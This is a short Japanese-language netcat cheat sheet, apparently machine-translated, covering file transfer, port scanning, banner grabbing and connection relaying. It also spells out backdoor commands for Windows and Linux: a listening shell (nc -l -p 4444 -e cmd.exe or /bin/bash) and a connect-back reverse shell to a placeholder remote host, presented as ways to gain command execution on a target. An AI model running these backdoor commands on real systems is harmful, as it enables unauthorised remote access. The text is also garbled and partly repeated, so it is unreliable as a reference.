netcat
2069 ワード
base 64変換端末にbase 64を入力し、変換したい数値base 64 dangtianpengを入力して車に戻ったらctrl+Dを押すと得られる
tcp/ipプロトコルに基づく(c/sモデル)
サーバ側からクライアントへのデータ転送
情報の転送:nc-l-p localport nc-l-p 333(サーバ側のip:1.1.1.1)サーバ側を作成する方法
shellの使用を返して、nc-l-p[localport]-e cmdのサーバメソッドを作成します.exe
ncでのデータ転送は,標準的な入出力ストリームを用いるため,コマンドラインを直接利用して操作することができる.
ファイル転送の使用方法:nc-l-p[localport]>outfile eのサーバ側メソッドを作成します.txt nc -l -p 333 > outfile.txtクライアント(転送ファイル)nc[remote_addr][remoteport]この時点でサービス側が接続の準備ができておらず、クライアントがncを使用して接続している場合、クライアントはずっと待っていて、接続上のサービス側を知っていて、待機時間nc-w 3[ip][port]を設定して待機時間を3秒に設定し、3秒後、クライアントは直接接続を閉じます.
Netcat情報プローブターゲットイントラネットのスキャン 単純にあるターゲットに対してポートプローブ を行う.ターゲットのサービスbannerをキャプチャ ポートスキャンはnc-v-n-z-w 1[target_ip][start_target_port-stop_target_port]-vを使用してエラーの詳細出力を示します-nターゲットマシンにDNS解析-z zero I/Oモードを行わず、ポートスキャン専用で、ターゲットIPに送信されたデータテーブルにpayloadが含まれていないことを示します.これにより、スキャンを加速できる速度-w 1タイムアウトを1秒に設定します
bannerキャプチャecho"|nc-v-n-w 1[target_ip][start_target_port-stop_target_port]
ターゲットのコマンド実行権限の取得
Windowsバックドアの作成方法:傍受型バックドアnc-l-p 4444-e cmd.exe 接続型バックドアnc[remote_ip][remote_port]-e cmd.exe
linuxバックドアの作成方法1.リスニング型バックドア:nc-l-p 4444-e/bin/bash 2.接続型バックドアnc[remote_ip][remote_port]-e/bin/bash
コマンドパラメータ
コマンドパラメータ-hを表示してコマンドウィンドウを離れて、バックグラウンドで-dを実行してあるプログラムを実行して、バックドア-e設定ゲートウェイを創立して、よく内網の制限-Gルートのホップ数-gを突破して各行のデータの時間間隔を設定します-i netcatが傍受状態で接続を待つことを設定します-l設定netcatが監視状態で接続を待つことを設定して、クライアントが開く時、サービス側は依然として待機状態に戻る-L設定netcatはipアドレスのみを認識し、DNS解析を行わない-n転送16進数のデータを設定-oローカルリスニングのポート番号を設定-p netcatランダム化のポート番号を設定-r netcatソースアドレスを設定-s telnetに返信するリクエストパケットを設定-t設定netcat UDPモード-u(netcatデフォルトtcpを使用するモード)エラーメッセージを表示-v接続タイムアウト秒数-w設定スキャンモードを設定し、送信されたパケットにpayload-zが含まれていないことを示す
接続転送は、特定の場合の接続制限を突破するために、特定の場合echo nc[target][port]>delayを処理する.bat nc -l -p [localport] -e delay.batクライアントがサービス側に接続されている場合、接続されたクライアントと、サービス側を介してtarget portに接続されて接続転送機能が実現される.()
tcp/ipプロトコルに基づく(c/sモデル)
サーバ側からクライアントへのデータ転送
情報の転送:nc-l-p localport nc-l-p 333(サーバ側のip:1.1.1.1)サーバ側を作成する方法
( )
nc [remote_addr] [remoteport]
nc -nv 1.1.1.1 333
shellの使用を返して、nc-l-p[localport]-e cmdのサーバメソッドを作成します.exe
( )
nc [remote_addr][remoteport]
ncでのデータ転送は,標準的な入出力ストリームを用いるため,コマンドラインを直接利用して操作することができる.
ファイル転送の使用方法:nc-l-p[localport]>outfile eのサーバ側メソッドを作成します.txt nc -l -p 333 > outfile.txtクライアント(転送ファイル)nc[remote_addr][remoteport]この時点でサービス側が接続の準備ができておらず、クライアントがncを使用して接続している場合、クライアントはずっと待っていて、接続上のサービス側を知っていて、待機時間nc-w 3[ip][port]を設定して待機時間を3秒に設定し、3秒後、クライアントは直接接続を閉じます.
Netcat情報プローブ
bannerキャプチャecho"|nc-v-n-w 1[target_ip][start_target_port-stop_target_port]
ターゲットのコマンド実行権限の取得
Windowsバックドアの作成方法:
linuxバックドアの作成方法1.リスニング型バックドア:nc-l-p 4444-e/bin/bash 2.接続型バックドアnc[remote_ip][remote_port]-e/bin/bash
コマンドパラメータ
コマンドパラメータ-hを表示してコマンドウィンドウを離れて、バックグラウンドで-dを実行してあるプログラムを実行して、バックドア-e設定ゲートウェイを創立して、よく内網の制限-Gルートのホップ数-gを突破して各行のデータの時間間隔を設定します-i netcatが傍受状態で接続を待つことを設定します-l設定netcatが監視状態で接続を待つことを設定して、クライアントが開く時、サービス側は依然として待機状態に戻る-L設定netcatはipアドレスのみを認識し、DNS解析を行わない-n転送16進数のデータを設定-oローカルリスニングのポート番号を設定-p netcatランダム化のポート番号を設定-r netcatソースアドレスを設定-s telnetに返信するリクエストパケットを設定-t設定netcat UDPモード-u(netcatデフォルトtcpを使用するモード)エラーメッセージを表示-v接続タイムアウト秒数-w設定スキャンモードを設定し、送信されたパケットにpayload-zが含まれていないことを示す
接続転送は、特定の場合の接続制限を突破するために、特定の場合echo nc[target][port]>delayを処理する.bat nc -l -p [localport] -e delay.batクライアントがサービス側に接続されている場合、接続されたクライアントと、サービス側を介してtarget portに接続されて接続転送機能が実現される.()